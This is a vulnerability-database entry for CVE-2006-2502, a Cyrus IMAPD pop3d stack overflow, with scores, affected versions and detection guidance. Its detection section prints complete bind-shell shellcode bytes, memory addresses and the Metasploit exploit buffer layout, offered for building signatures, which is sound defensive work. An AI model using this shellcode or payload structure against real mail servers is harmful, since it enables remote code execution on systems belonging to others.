cbcvebase.
CVE-2006-2502
published 2006-05-22

CVE-2006-2502: Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary…

PriorityP348medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
53.33%
98.9th percentile
Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.

Affected

1 ranges
VendorProductVersion rangeFixed in
cyrusimapd

Detection & IOCsextracted from sources · hover to see the quote

port110
commandUSER <shellcode><packed_offset x120>
other0x8106c20
other0x080fd318
other0x080fd204
bytes
\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
  • Detect exploitation attempts by monitoring POP3 (TCP/110) for oversized USER commands — the exploit sends a USER argument containing shellcode followed by repeated return address packing, resulting in a payload well exceeding normal username length.
  • Alert on inbound TCP connections to port 13370 from a host that recently sent a malformed POP3 USER command — the bind-shell shellcode opens a listener on port 13370.
  • Scan network traffic on TCP/110 for the bind-shell shellcode byte sequence starting with \x31\xdb\x53\x43\x53\x6a\x02 within a USER command.
  • The exploit overwrites the GOT to place shellcode and defeat stack-protection/ASLR; monitor for unexpected executable memory writes in pop3d process space (e.g., via ptrace or kernel auditing).
  • The vulnerability is only triggerable when the non-default 'popsubfolders' option is enabled in Cyrus IMAPD config; audit imapd.conf for this setting as a risk indicator.
  • The Metasploit exploit buffer layout is: 'USER ' + 265 NOPs + ret*2 + (250-shellcode_len) NOPs + shellcode + 29 NOPs + sc_addr*4 + CRLF — use this structure to build a Snort/Suricata content match on TCP/110.
  • ·The vulnerability is only exploitable when the non-default 'popsubfolders' option is enabled in Cyrus IMAPD configuration; systems without this option are not affected.
  • ·Fedora Core 5 ships with the vulnerable code version but is not exploitable due to the FORTIFY_SOURCE compiler enhancement.
  • ·Red Hat Enterprise Linux versions of cyrus-imapd are not affected by this issue.

CVSS provenance

nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
vendor_redhat5.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.